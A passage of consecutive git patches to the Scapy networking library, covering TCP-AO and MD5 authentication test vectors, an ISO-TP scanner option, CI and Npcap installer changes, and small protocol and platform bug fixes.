IP(fromhex(packet_hex)) + assert p[IP].proto == socket.IPPROTO_TCP + elif ipv == 6: + p = IPv6(fromhex(packet_hex)) + assert p[IPv6].nh == socket.IPPROTO_TCP + else: + raise ValueError("bad ipv={}".format(ipv)) + # sanity check for seq/ack in SYN/ACK packets + if p[TCP].flags.S and p[TCP].flags.A is False: + assert p[TCP].seq == src_isn + assert p[TCP].ack == 0 + if p[TCP].flags.S and p[TCP].flags.A: + assert p[TCP].seq == src_isn + assert p[TCP].ack == dst_isn + 1 + # check option bytes in header + opt = get_tcpao(p[TCP]) + assert opt is not None + assert opt.keyid in [client_keyid, server_keyid] + assert opt.rnextkeyid in [client_keyid, server_keyid] + assert opt.mac == fromhex(mac_hex), "match parsed mac" + # check traffic key + alg = get_alg(alg_name) + context_bytes = tcpao.build_context_from_packet(p, src_isn, dst_isn) + traffic_key = alg.kdf(master_key, context_bytes) + assert traffic_key == fromhex(traffic_key_hex), "match traffic key" + # check mac + message_bytes = tcpao.build_message_from_packet( + p, include_options=include_options, sne=sne + ) + mac = alg.mac(traffic_key, message_bytes) + assert mac == fromhex(mac_hex), "match computed mac" + += TCP-AO Test Vector 4.1.1: SHA-1 Send Syn +client_isn_41x = 0xFBFBAB5A +server_isn_41x = 0x11C14261 + +check( + """ + 45 e0 00 4c dd 0f 40 00 ff 06 bf 6b 0a 0b 0c 0d + ac 1b 1c 1d e9 d7 00 b3 fb fb ab 5a 00 00 00 00 + e0 02 ff ff ca c4 00 00 02 04 05 b4 01 03 03 08 + 04 02 08 0a 00 15 5a b7 00 00 00 00 1d 10 3d 54 + 2e e4 37 c6 f8 ed e6 d7 c4 d6 02 e7 + """, + "6d 63 ef 1b 02 fe 15 09 d4 b1 40 27 07 fd 7b 04 16 ab b7 4f", + "2e e4 37 c6 f8 ed e6 d7 c4 d6 02 e7", + client_isn_41x, + 0, +) + += TCP-AO Test Vector 4.1.2 SHA-1 Recv Syn-Ack +check( + """ + 45 e0 00 4c 65 06 40 00 ff 06 37 75 ac 1b 1c 1d + 0a 0b 0c 0d 00 b3 e9 d7 11 c1 42 61 fb fb ab 5b + e0 12 ff ff 37 76 00 00 02 04 05 b4 01 03 03 08 + 04 02 08 0a 84 a5 0b eb 00 15 5a b7 1d 10 54 3d + ee ab 0f e2 4c 30 10 81 51 16 b3 be + """, + "d9 e2 17 e4 83 4a 80 ca 2f 3f d8 de 2e 41 b8 e6 79 7f ea 96", + "ee ab 0f e2 4c 30 10 81 51 16 b3 be", + server_isn_41x, + client_isn_41x, +) + += TCP-AO Test Vector 4.1.3 SHA-1 Send Other +check( + """ + 45 e0 00 87 36 a1 40 00 ff 06 65 9f 0a 0b 0c 0d + ac 1b 1c 1d e9 d7 00 b3 fb fb ab 5b 11 c1 42 62 + c0 18 01 04 a1 62 00 00 01 01 08 0a 00 15 5a c1 + 84 a5 0b eb 1d 10 3d 54 70 64 cf 99 8c c6 c3 15 + c2 c2 e2 bf ff ff ff ff ff ff ff ff ff ff ff ff + ff ff ff ff 00 43 01 04 da bf 00 b4 0a 0b 0c 0d + 26 02 06 01 04 00 01 00 01 02 02 80 00 02 02 02 + 00 02 02 42 00 02 06 41 04 00 00 da bf 02 08 40 + 06 00 64 00 01 01 00 + """, + "d2 e5 9c 65 ff c7 b1 a3 93 47 65 64 63 b7 0e dc 24 a1 3d 71", + "70 64 cf 99 8c c6 c3 15 c2 c2 e2 bf", + client_isn_41x, + server_isn_41x, +) + += TCP-AO Test Vector 4.1.4 SHA-1 Recv Other +check( + """ + 45 e0 00 87 1f a9 40 00 ff 06 7c 97 ac 1b 1c 1d + 0a 0b 0c 0d 00 b3 e9 d7 11 c1 42 62 fb fb ab 9e + c0 18 01 00 40 0c 00 00 01 01 08 0a 84 a5 0b f5 + 00 15 5a c1 1d 10 54 3d a6 3f 0e cb bb 2e 63 5c + 95 4d ea c7 ff ff ff ff ff ff ff ff ff ff ff ff + ff ff ff ff 00 43 01 04 da c0 00 b4 ac 1b 1c 1d + 26 02 06 01 04 00 01 00 01 02 02 80 00 02 02 02 + 00 02 02 42 00 02 06 41 04 00 00 da c0 02 08 40 + 06 00 64 00 01 01 00 + """, + "d9 e2 17 e4 83 4a 80 ca 2f 3f d8 de 2e 41 b8 e6 79 7f ea 96", + "a6 3f 0e cb bb 2e 63 5c 95 4d ea c7", + server_isn_41x, + client_isn_41x, +) + += TCP-AO Test Vector 4.2.1 +client_isn_42x = 0xCB0EFBEE +server_isn_42x = 0xACD5B5E1 +check( + """ + 45 e0 00 4c 53 99 40 00 ff 06 48 e2 0a 0b 0c 0d + ac 1b 1c 1d ff 12 00 b3 cb 0e fb ee 00 00 00 00 + e0 02 ff ff 54 1f 00 00 02 04 05 b4 01 03 03 08 + 04 02 08 0a 00 02 4c ce 00 00 00 00 1d 10 3d 54 + 80 af 3c fe b8 53 68 93 7b 8f 9e c2 + """, + "30 ea a1 56 0c f0 be 57 da b5 c0 45 22 9f b1 0a 42 3c d7 ea", + "80 af 3c fe b8 53 68 93 7b 8f 9e c2", + client_isn_42x, + 0, + include_options=False, +) + += TCP-AO Test Vector 4.2.2 +check( + """ + 45 e0 00 4c 32 84 40 00 ff 06 69 f7 ac 1b 1c 1d + 0a 0b 0c 0d 00 b3 ff 12 ac d5 b5 e1 cb 0e fb ef + e0 12 ff ff 38 8e 00 00 02 04 05 b4 01 03 03 08 + 04 02 08 0a 57 67 72 f3 00 02 4c ce 1d 10 54 3d + 09 30 6f 9a ce a6 3a 8c 68 cb 9a 70 + """, + "b5 b2 89 6b b3 66 4e 81 76 b0 ed c6 e7 99 52 41 01 a8 30 7f", + "09 30 6f 9a ce a6 3a 8c 68 cb 9a 70", + server_isn_42x, + client_isn_42x, + include_options=False, +) + += TCP-AO Test Vector 4.2.3 +check( + """ + 45 e0 00 87 a8 f5 40 00 ff 06 f3 4a 0a 0b 0c 0d + ac 1b 1c 1d ff 12 00 b3 cb 0e fb ef ac d5 b5 e2 + c0 18 01 04 6c 45 00 00 01 01 08 0a 00 02 4c ce + 57 67 72 f3 1d 10 3d 54 71 06 08 cc 69 6c 03 a2 + 71 c9 3a a5 ff ff ff ff ff ff ff ff ff ff ff ff + ff ff ff ff 00 43 01 04 da bf 00 b4 0a 0b 0c 0d + 26 02 06 01 04 00 01 00 01 02 02 80 00 02 02 02 + 00 02 02 42 00 02 06 41 04 00 00 da bf 02 08 40 + 06 00 64 00 01 01 00 + """, + "f3 db 17 93 d7 91 0e cd 80 6c 34 f1 55 ea 1f 00 34 59 53 e3", + "71 06 08 cc 69 6c 03 a2 71 c9 3a a5", + client_isn_42x, + server_isn_42x, + include_options=False, +) + += TCP-AO Test Vector 4.2.4 +check( + """ + 45 e0 00 87 54 37 40 00 ff 06 48 09 ac 1b 1c 1d + 0a 0b 0c 0d 00 b3 ff 12 ac d5 b5 e2 cb 0e fc 32 + c0 18 01 00 46 b6 00 00 01 01 08 0a 57 67 72 f3 + 00 02 4c ce 1d 10 54 3d 97 76 6e 48 ac 26 2d e9 + ae 61 b4 f9 ff ff ff ff ff ff ff ff ff ff ff ff + ff ff ff ff 00 43 01 04 da c0 00 b4 ac 1b 1c 1d + 26 02 06 01 04 00 01 00 01 02 02 80 00 02 02 02 + 00 02 02 42 00 02 06 41 04 00 00 da c0 02 08 40 + 06 00 64 00 01 01 00 + """, + "b5 b2 89 6b b3 66 4e 81 76 b0 ed c6 e7 99 52 41 01 a8 30 7f", + "97 76 6e 48 ac 26 2d e9 ae 61 b4 f9", + server_isn_42x, + client_isn_42x, + include_options=False, +) + += TCP-AO Test Vector 5.1.1 +check( + """ + 45 e0 00 4c 7b 9f 40 00 ff 06 20 dc 0a 0b 0c 0d + ac 1b 1c 1d c4 fa 00 b3 78 7a 1d df 00 00 00 00 + e0 02 ff ff 5a 0f 00 00 02 04 05 b4 01 03 03 08 + 04 02 08 0a 00 01 7e d0 00 00 00 00 1d 10 3d 54 + e4 77 e9 9c 80 40 76 54 98 e5 50 91 + """, + "f5 b8 b3 d5 f3 4f db b6 eb 8d 4a b9 66 0e 60 e3", + "e4 77 e9 9c 80 40 76 54 98 e5 50 91", + 0x787A1DDF, + 0, + include_options=True, + alg_name="AES-128-CMAC-96", +) + += TCP-AO Test Vector 6.1.1 +client_isn_61x = 0x176A833F +server_isn_61x = 0x3F51994B +check( + """ + 6e 08 91 dc 00 38 06 40 fd 00 00 00 00 00 00 00 + 00 00 00 00 00 00 00 01 fd 00 00 00 00 00 00 00 + 00 00 00 00 00 00 00 02 f7 e4 00 b3 17 6a 83 3f + 00 00 00 00 e0 02 ff ff 47 21 00 00 02 04 05 a0 + 01 03 03 08 04 02 08 0a 00 41 d0 87 00 00 00 00 + 1d 10 3d 54 90 33 ec 3d 73 34 b6 4c 5e dd 03 9f + """, + "62 5e c0 9d 57 58 36 ed c9 b6 42 84 18 bb f0 69 89 a3 61 bb", + "90 33 ec 3d 73 34 b6 4c 5e dd 03 9f", + client_isn_61x, + 0, + include_options=True, +) + += TCP-AO Test Vector 6.1.2 +check( + """ + 6e 01 00 9e 00 38 06 40 fd 00 00 00 00 00 00 00 + 00 00 00 00 00 00 00 02 fd 00 00 00 00 00 00 00 + 00 00 00 00 00 00 00 01 00 b3 f7 e4 3f 51 99 4b + 17 6a 83 40 e0 12 ff ff bf ec 00 00 02 04 05 a0 + 01 03 03 08 04 02 08 0a bd 33 12 9b 00 41 d0 87 + 1d 10 54 3d f1 cb a3 46 c3 52 61 63 f7 1f 1f 55 + """, + "e4 a3 7a da 2a 0a fc a8 71 14 34 91 3f e1 38 c7 71 eb cb 4a", + "f1 cb a3 46 c3 52 61 63 f7 1f 1f 55", + server_isn_61x, + client_isn_61x, + include_options=True, +) + += TCP-AO Test Vector 6.2.2 +client_isn_62x = 0x020C1E69 +server_isn_62x = 0xEBA3734D +check( + """ + 6e 0a 7e 1f 00 38 06 40 fd 00 00 00 00 00 00 00 + 00 00 00 00 00 00 00 02 fd 00 00 00 00 00 00 00 + 00 00 00 00 00 00 00 01 00 b3 c6 cd eb a3 73 4d + 02 0c 1e 6a e0 12 ff ff 77 4d 00 00 02 04 05 a0 + 01 03 03 08 04 02 08 0a 5e c9 9b 70 00 9d b9 5b + 1d 10 54 3d 3c 54 6b ad 97 43 f1 2d f8 b8 01 0d + """, + "40 51 08 94 7f 99 65 75 e7 bd bc 26 d4 02 16 a2 c7 fa 91 bd", + "3c 54 6b ad 97 43 f1 2d f8 b8 01 0d", + server_isn_62x, + client_isn_62x, + include_options=False, +) + += TCP-AO Test Vector 6.2.4 +check( + """ + 6e 0a 7e 1f 00 73 06 40 fd 00 00 00 00 00 00 00 + 00 00 00 00 00 00 00 02 fd 00 00 00 00 00 00 00 + 00 00 00 00 00 00 00 01 00 b3 c6 cd eb a3 73 4e + 02 0c 1e ad c0 18 01 00 71 6a 00 00 01 01 08 0a + 5e c9 9b 7a 00 9d b9 65 1d 10 54 3d 55 9a 81 94 + 45 b4 fd e9 8d 9e 13 17 ff ff ff ff ff ff ff ff + ff ff ff ff ff ff ff ff 00 43 01 04 fd e8 00 b4 + 01 01 01 7a 26 02 06 01 04 00 01 00 01 02 02 80 + 00 02 02 02 00 02 02 42 00 02 06 41 04 00 00 fd + e8 02 08 40 06 00 64 00 01 01 00 + """, + "40 51 08 94 7f 99 65 75 e7 bd bc 26 d4 02 16 a2 c7 fa 91 bd", + "55 9a 81 94 45 b4 fd e9 8d 9e 13 17", + server_isn_62x, + client_isn_62x, + include_options=False, +) + += TCP-AO Test Vector 7.1.2 +server_isn_71x = 0xA6744ECB +client_isn_71x = 0x193CCCEC +check( + """ + 6e 06 15 20 00 38 06 40 fd 00 00 00 00 00 00 00 + 00 00 00 00 00 00 00 02 fd 00 00 00 00 00 00 00 + 00 00 00 00 00 00 00 01 00 b3 f8 5a a6 74 4e cb + 19 3c cc ed e0 12 ff ff ea bb 00 00 02 04 05 a0 + 01 03 03 08 04 02 08 0a 71 da ab c8 13 e4 ab 99 + 1d 10 54 3d dc 28 43 a8 4e 78 a6 bc fd c5 ed 80 + """, + "cf 1b 1e 22 5e 06 a6 36 16 76 4a 06 7b 46 f4 b1", + "dc 28 43 a8 4e 78 a6 bc fd c5 ed 80", + server_isn_71x, + client_isn_71x, + alg_name="AES-128-CMAC-96", + include_options=True, +) + += TCP-AO Test Vector 7.1.4 +check( + """ + 6e 06 15 20 00 73 06 40 fd 00 00 00 00 00 00 00 + 00 00 00 00 00 00 00 02 fd 00 00 00 00 00 00 00 + 00 00 00 00 00 00 00 01 00 b3 f8 5a a6 74 4e cc + 19 3c cd 30 c0 18 01 00 52 f4 00 00 01 01 08 0a + 71 da ab d3 13 e4 ab a3 1d 10 54 3d c1 06 9b 7d + fd 3d 69 3a 6d f3 f2 89 ff ff ff ff ff ff ff ff + ff ff ff ff ff ff ff ff 00 43 01 04 fd e8 00 b4 + 01 01 01 7a 26 02 06 01 04 00 01 00 01 02 02 80 + 00 02 02 02 00 02 02 42 00 02 06 41 04 00 00 fd + e8 02 08 40 06 00 64 00 01 01 00 + """, + "cf 1b 1e 22 5e 06 a6 36 16 76 4a 06 7b 46 f4 b1", + "c1 06 9b 7d fd 3d 69 3a 6d f3 f2 89", + server_isn_71x, + client_isn_71x, + alg_name="AES-128-CMAC-96", + include_options=True, +) + ++ TCP-AO Signature API += TCP-AO sign SYN packet build from scratch +master_key = b"hello" +alg = TCPAOAlg_HMAC_SHA1() +keyid = 12 +rnextkeyid = 34 + +p = IP() / TCP() +p[TCP].flags == "S" +sisn = p[TCP].seq +disn = 0 + +# sign +traffic_key = calc_tcpao_traffic_key(p, alg, master_key, sisn, disn) +sign_tcpao(p, alg, traffic_key, keyid, rnextkeyid) +mac = calc_tcpao_mac(p, alg, traffic_key) + +# parse +p2 = IP(raw(p)) +ao = get_tcpao(p2[TCP]) +ao is not None +ao.keyid == keyid +ao.rnextkeyid == rnextkeyid +ao.mac == mac + +# calculate signature again on parsed packet +traffic_key2 = calc_tcpao_traffic_key(p2, alg, master_key, p2[TCP].seq, 0) +traffic_key == traffic_key2 +mac2 = calc_tcpao_mac(p2, alg, traffic_key2) +mac == mac2 diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index 2b834564583..9c1fccc1ebd 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -294,6 +294,57 @@ TCP(raw(TCP(dataofs=11)/b"o")) = TCP options: MPTCP - basic build using bytes raw(TCP(options=[(30, b"\x10\x03\xc1\x1c\x95\x9b\x81R_1")])) == b"\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00\x80\x02 \x00\x00\x00\x00\x00\x1e\x0c\x10\x03\xc1\x1c\x95\x9b\x81R_1" += TCP options: MD5 build and parse +md5sig = b"0123456789abcdef" +p = IP() / TCP(options=[('MD5', md5sig)]) +md5opt = IP(raw(p))[TCP].options[0] +md5opt[0] == 'MD5' +md5opt[1] == md5sig + += TCP options: MD5 IPv4 (depends on default values) +p = IP() / TCP() +mac = calc_tcp_md5_hash(p[TCP], b"12345") +assert mac == bytearray.fromhex("797e69f8dbe44a8b84f687a2832595ed") + += TCP options: MD5 IPv6 (depends on default values) +p = IPv6() / TCP() +mac = calc_tcp_md5_hash(p[TCP], b"12345") +assert mac == bytearray.fromhex("3711309b0305a4269ec5dbc27183e9a0") + += TCP options: MD5 sign (depends on default values) +p = IP() / TCP() +sign_tcp_md5(p[TCP], b"12345") +raw(p[TCP]) == bytearray.fromhex("001400500000000000000000a0022000fec200001312797e69f8dbe44a8b84f687a2832595ed0000") +md5opt = IP(raw(p))[TCP].options[0] +md5opt[1] == bytearray.fromhex("797e69f8dbe44a8b84f687a2832595ed") + += TCP Authentication Option: build +opt = TCPAOValue(keyid=1, rnextkeyid=2, mac=b"FAKE") +assert opt.keyid == 1 +assert opt.rnextkeyid == 2 +assert opt.mac == b"FAKE" +assert bytes(opt) == b"\x01\x02FAKE" + += TCP Authentication Option: parse +opt = TCPAOValue(b"\x01\x02FAKE") +assert opt.keyid == 1 +assert opt.rnextkeyid == 2 +assert opt.mac == b"FAKE" + += TCP Authentication Option: parse from TCP +p = IP(bytes(bytearray.fromhex("45e0004cdd0f4000ff06bf6b0a0b0c0dac1b1c1de9d700b3fbfbab5a00000000e002ffffcac40000020405b4010303080402080a00155ab7000000001d103d542ee437c6f8ede6d7c4d602e7"))) +tcpao = get_tcpao(p[TCP]) +assert isinstance(tcpao, TCPAOValue) +assert tcpao.keyid == 61 +assert tcpao.rnextkeyid == 84 +assert tcpao.mac == bytearray.fromhex("2ee437c6f8ede6d7c4d602e7") + += TCP Authentication Option: build TCP +p = TCP(options=[('AO', TCPAOValue(keyid=1, rnextkeyid=2, mac=b"3456"))]) +p.summary() +print(bytes(p)) +assert bytes(p).endswith(b"\x01\x023456") + = TCP options: invalid data offset data = b'\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00\x80\x02 \x00\x1b\xb8\x00\x00\x02\x04\x05\xb4\x04\x02\x08\x06\xf7\xa26C\x00\x00\x00\x00\x01\x03\x03\x07' p = TCP(data) @@ -309,10 +360,6 @@ random.seed(0x2807) pkt = fuzz(pkt) options = pkt.options._fix() options -if six.PY2: - assert options == [('WScale', (32,)), ('NOP', ''), ('WScale', (145,)), ('WScale', (165,))] -else: - assert options in [[('TFO', (1822729092, 2707522527)), ('Mood', (b'\x19',)), ('WScale', (117,))], [('TFO', (725644109, 3830853589)), ('Timestamp', (2604802746, 4137267106)), ('WScale', (227,)), ('Timestamp', (38044154, 828782501)), ('AltChkSum', (126, 40603))]] = IP, TCP & UDP checksums (these tests highly depend on default values) pkt = IP() / TCP() From cb53be162d30ae2e7184a15e133f101e73fc57a0 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 9 Apr 2022 20:23:45 +0200 Subject: [PATCH 0767/1632] Add additional parameter to isotp-scan (#3575) * Add additional parameter to isotp-scan * fix flake --- scapy/contrib/isotp/isotp_scanner.py | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/scapy/contrib/isotp/isotp_scanner.py b/scapy/contrib/isotp/isotp_scanner.py index b455c4b1732..fb84eb6d09a 100644 --- a/scapy/contrib/isotp/isotp_scanner.py +++ b/scapy/contrib/isotp/isotp_scanner.py @@ -158,6 +158,7 @@ def scan(sock, # type: SuperSocket noise_ids=None, # type: Optional[List[int]] sniff_time=0.1, # type: float extended_can_id=False, # type: bool + verify_results=True, # type: bool verbose=False # type: bool ): # type: (...) -> Dict[int, Tuple[Packet, int]] """Scan and return dictionary of detections @@ -172,6 +173,8 @@ def scan(sock, # type: SuperSocket :param sniff_time: time the scan waits for isotp flow control responses after sending a first frame :param extended_can_id: Send extended can frames + :param verify_results: Verify scan results. This will cause a second scan + of all possible candidates for ISOTP Sockets :param verbose: displays information during scan :return: Dictionary with all found packets """ @@ -185,6 +188,9 @@ def scan(sock, # type: SuperSocket verbose), timeout=sniff_time, store=False) + if not verify_results: + return return_values + cleaned_ret_val = dict() # type: Dict[int, Tuple[Packet, int]] for tested_id in return_values.keys(): for value in range(max(0, tested_id - 2), tested_id + 2, 1): @@ -270,6 +276,7 @@ def isotp_scan(sock, # type: SuperSocket output_format=None, # type: Optional[str] can_interface=None, # type: Optional[str] extended_can_id=False, # type: bool + verify_results=True, # type: bool verbose=False # type: bool ): # type: (...) -> Union[str, List[SuperSocket]] @@ -296,6 +303,8 @@ def isotp_scan(sock, # type: SuperSocket "text". Default is "socket". :param can_interface: interface used to create the returned code/sockets :param extended_can_id: Use Extended CAN-Frames + :param verify_results: Verify scan results. This will cause a second scan + of all possible candidates for ISOTP Sockets :param verbose: displays information during scan :return: """ @@ -325,6 +334,7 @@ def isotp_scan(sock, # type: SuperSocket noise_ids=noise_ids, sniff_time=sniff_time, extended_can_id=extended_can_id, + verify_results=verify_results, verbose=verbose) filter_periodic_packets(found_packets, verbose) From 713cc8cafa94756c02f06ebd485a51b6134d2afe Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 9 Apr 2022 20:24:14 +0200 Subject: [PATCH 0768/1632] Minor cleanups in CI setup (#3565) * Add Gitlab-ci.yml * cleanup * remove gitlab-ci.yml file --- .config/ci/install.sh | 2 +- test/contrib/automotive/interface_mockup.py | 15 +++++++++------ test/contrib/isotp_packet.uts | 2 ++ tox.ini | 1 + 4 files changed, 13 insertions(+), 7 deletions(-) diff --git a/.config/ci/install.sh b/.config/ci/install.sh index 8a93f569755..f33d7b3ecda 100755 --- a/.config/ci/install.sh +++ b/.config/ci/install.sh @@ -28,7 +28,7 @@ if [ "$OSTYPE" = "linux-gnu" ] || [ "$TRAVIS_OS_NAME" = "linux" ] then sudo apt-get update sudo apt-get -qy install tshark net-tools || exit 1 - sudo apt-get -qy install can-utils build-essential linux-headers-$(uname -r) linux-modules-extra-$(uname -r) || exit 1 + sudo apt-get -qy install can-utils || exit 1 # Make sure libpcap is installed if [ ! -z $SCAPY_USE_LIBPCAP ] diff --git a/test/contrib/automotive/interface_mockup.py b/test/contrib/automotive/interface_mockup.py index ca15042b778..661ad8d454f 100644 --- a/test/contrib/automotive/interface_mockup.py +++ b/test/contrib/automotive/interface_mockup.py @@ -57,10 +57,13 @@ def test_and_setup_socket_can(iface_name): if LINUX and _root and _not_pypy: - test_and_setup_socket_can(iface0) - test_and_setup_socket_can(iface1) - log_runtime.debug("CAN should work now") - _socket_can_support = True + try: + test_and_setup_socket_can(iface0) + test_and_setup_socket_can(iface1) + log_runtime.debug("CAN should work now") + _socket_can_support = True + except Exception as e: + sys.__stderr__.write("ERROR %s!\n" % e) sys.__stderr__.write("SocketCAN support: %s\n" % _socket_can_support) @@ -113,7 +116,7 @@ def cleanup_interfaces(): :return: True on success """ - if LINUX and _not_pypy and _root: + if _socket_can_support: if 0 != subprocess.call(["ip", "link", "delete", iface0]): raise Exception("%s could not be deleted" % iface0) if 0 != subprocess.call(["ip", "link", "delete", iface1]): @@ -168,7 +171,7 @@ def exit_if_no_isotp_module(): # ############################################################################ # """ Evaluate if ISOTP kernel module is installed and available """ # ############################################################################ -if LINUX and _root and six.PY3: +if LINUX and _root and six.PY3 and _socket_can_support: p1 = subprocess.Popen(['lsmod'], stdout=subprocess.PIPE) p2 = subprocess.Popen(['grep', '^can_isotp'], stdout=subprocess.PIPE, stdin=p1.stdout) diff --git a/test/contrib/isotp_packet.uts b/test/contrib/isotp_packet.uts index 191b251f047..fa3ec1cd368 100644 --- a/test/contrib/isotp_packet.uts +++ b/test/contrib/isotp_packet.uts @@ -407,6 +407,8 @@ except Scapy_Exception: assert ex = Fragment exception +~ not_pypy + ex = False try: fragments = ISOTP(b"a" * (1 << 32)).fragment() diff --git a/tox.ini b/tox.ini index 1f92d6dd669..88a95bf778b 100644 --- a/tox.ini +++ b/tox.ini @@ -51,6 +51,7 @@ whitelist_externals = sudo passenv = PATH PWD PROGRAMFILES WINDIR SYSTEMROOT deps = {[testenv]deps} commands = + sudo apt-get -qy install build-essential linux-headers-$(uname -r) linux-modules-extra-$(uname -r) sudo -E modprobe can git clone --depth=1 https://github.com/linux-can/can-utils.git /tmp/can-utils bash -c "cd /tmp/can-utils; ./autogen.sh; ./configure; make; sudo make install" From 285824f80e7cde43af1ecf6540e7bc1bc1e1bc0b Mon Sep 17 00:00:00 2001 From: yukio-m Date: Tue, 1 Mar 2022 17:33:48 +0900 Subject: [PATCH 0769/1632] Update core.py Fix for Mac computers with Apple silicon (M1). The BPF filter wasn't working, because the definition of the third argument of ioctl was wrong. --- scapy/arch/bpf/core.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/arch/bpf/core.py b/scapy/arch/bpf/core.py index 36d746518ed..428710194e4 100644 --- a/scapy/arch/bpf/core.py +++ b/scapy/arch/bpf/core.py @@ -37,7 +37,7 @@ LIBC = cdll.LoadLibrary(find_library("c")) -LIBC.ioctl.argtypes = [c_int, c_ulong, c_char_p] +LIBC.ioctl.argtypes = [c_int, c_ulong, ] LIBC.ioctl.restype = c_int # The following is implemented as of Python >= 3.3 From 7bf257e6eb1a69f2baaac5c7b2da935e3f05e72e Mon Sep 17 00:00:00 2001 From: Antons Belousovs Date: Wed, 6 Apr 2022 16:02:29 +0300 Subject: [PATCH 0770/1632] [GTP_UDPPort_ExtensionHeader_wrong_default_length] - Correct length for UDPPORT Extension header length --- scapy/contrib/gtp.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index 1c79df56606..87a8664e1c7 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -220,7 +220,7 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): class GTP_UDPPort_ExtensionHeader(GTP_ExtensionHeader): - fields_desc = [ByteField("length", 0x40), + fields_desc = [ByteField("length", 0x01), ShortField("udp_port", None), ByteEnumField("next_ex", 0, ExtensionHeadersTypes), ] From 3b6ec7f8bbb68842bf33ff4e831f06c6c5f75798 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 12 Apr 2022 18:02:53 +0200 Subject: [PATCH 0771/1632] Merge pull request #3559 from polybassa/appveyor_npcap_fallback Add fallback path for npcap installation --- .config/appveyor/InstallNpcap.ps1 | 56 +++++++++++++++++++++---------- 1 file changed, 38 insertions(+), 18 deletions(-) diff --git a/.config/appveyor/InstallNpcap.ps1 b/.config/appveyor/InstallNpcap.ps1 index ec27717e90e..ef7e4fb6e65 100644 --- a/.config/appveyor/InstallNpcap.ps1 +++ b/.config/appveyor/InstallNpcap.ps1 @@ -2,6 +2,7 @@ # Config: $npcap_oem_file = "npcap-1.60-oem.exe" +$npcap_oem_hash = "91e076eb9a197d55ca5e05b240e8049cd97ced3455eb7e7cb0f06066b423eb77" # Note: because we need the /S option (silent), this script has two cases: # - The script is runned from a master build, then use the secure variable 'npcap_oem_key' which will be available @@ -9,8 +10,24 @@ $npcap_oem_file = "npcap-1.60-oem.exe" # - The script is runned from a PR, then use the provided archived 0.96 version, which is the last public one to # provide support for the /S option -if (Test-Path Env:npcap_oem_key){ # Key is here: on master - echo "Using Npcap OEM version" +function checkTheSum($file, $hash) { + $_chksum = $(CertUtil -hashfile $file SHA256)[1] -replace " ","" + if ($_chksum -ne $hash){ + Write-Error "Checksums do NOT match !" + return 1, $file + } + return 0, $file +} + +function DownloadNPCAP_free { + $file = $PSScriptRoot+"\npcap-0.96.exe" + $hash = "83667e1306fdcf7f9967c10277b36b87e50ee8812e1ee2bb9443bdd065dc04a1" + # Download the 0.96 file from nmap servers + wget "https://npcap.com/dist/npcap-0.96.exe" -UseBasicParsing -OutFile $file + return checkTheSum $file $hash +} + +function DownloadNPCAP_oem { # Unpack the key $user, $pass = (Get-ChildItem Env:npcap_oem_key).Value.replace("`"", "").split(",") if(!$user -Or !$pass){ @@ -25,27 +42,30 @@ if (Test-Path Env:npcap_oem_key){ # Key is here: on master $secpasswd = ConvertTo-SecureString $pass -AsPlainText -Force $credential = New-Object System.Management.Automation.PSCredential($user, $secpasswd) try { - Invoke-WebRequest -uri (-join("https://nmap.org/npcap/oem/dist/",$npcap_oem_file)) -OutFile $file -Headers $headers -Credential $credential + Invoke-WebRequest -uri (-join("https://npcap.com/oem/dist/",$npcap_oem_file)) -OutFile $file -Headers $headers -Credential $credential } catch [System.Net.WebException],[System.IO.IOException] { - Write-Error "Error while dowloading npcap !" + Write-Error "Error while dowloading npcap oem!" Write-Warning $Error[0] - exit 1 + return 1, $file } -} else { # No key: PRs - echo "Using backup 0.96" - $file = $PSScriptRoot+"\npcap-0.96.exe" - # Download the 0.96 file from nmap servers - wget "https://nmap.org/npcap/dist/npcap-0.96.exe" -UseBasicParsing -OutFile $file - # Now let's check its checksum - $_chksum = $(CertUtil -hashfile $file SHA256)[1] -replace " ","" - if ($_chksum -ne "83667e1306fdcf7f9967c10277b36b87e50ee8812e1ee2bb9443bdd065dc04a1"){ - Write-Error "Checksums does NOT match !" - exit 1 - } else { - echo "Checksums matches !" + return checkTheSum $file $npcap_oem_hash +} + +if (Test-Path Env:npcap_oem_key){ # Key is here: on master + $success, $file = DownloadNPCAP_oem + if ($success -ne 0){ + $success, $file = DownloadNPCAP_free } +} else { # No key: PRs + $success, $file = DownloadNPCAP_free } -echo ('Installing: ' + $file) + +if ($success -ne 0){ + Write-Error ('Npcap installation of '+$file+' arborted !') + exit 1 +} + +Write-Output ('Installing: ' + $file) # Run installer $process = Start-Process $file -ArgumentList "/loopback_support=yes /S" -PassThru -Wait From 44e4121a727c04af5a580fb8923c55d96d535a07 Mon Sep 17 00:00:00 2001 From: Cosmin Grosu Date: Mon, 11 Apr 2022 15:39:10 +0000 Subject: [PATCH 0772/1632] Fixed issue #3567 --- scapy/arch/linux.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index 348366f3525..fcfe78bdbce 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -494,7 +494,7 @@ def __init__(self, if filter is not None: try: attach_filter(self.ins, filter, self.iface) - except ImportError as ex: + except (ImportError, Scapy_Exception) as ex: log_runtime.error("Cannot set filter: %s", ex) if self.promisc: set_promisc(self.ins, self.iface) From 9c3a3550d61bd59a58b6b84fa36182340ce0a6f4 Mon Sep 17 00:00:00 2001 From: Tijs-B Date: Thu, 21 Apr 2022 17:49:44 +0200 Subject: [PATCH 0773/1632] Merge pull request #3586 from Tijs-B/patch-1 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Issue template: change pip install url to https --- .github/ISSUE_TEMPLATE/BUGS.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git 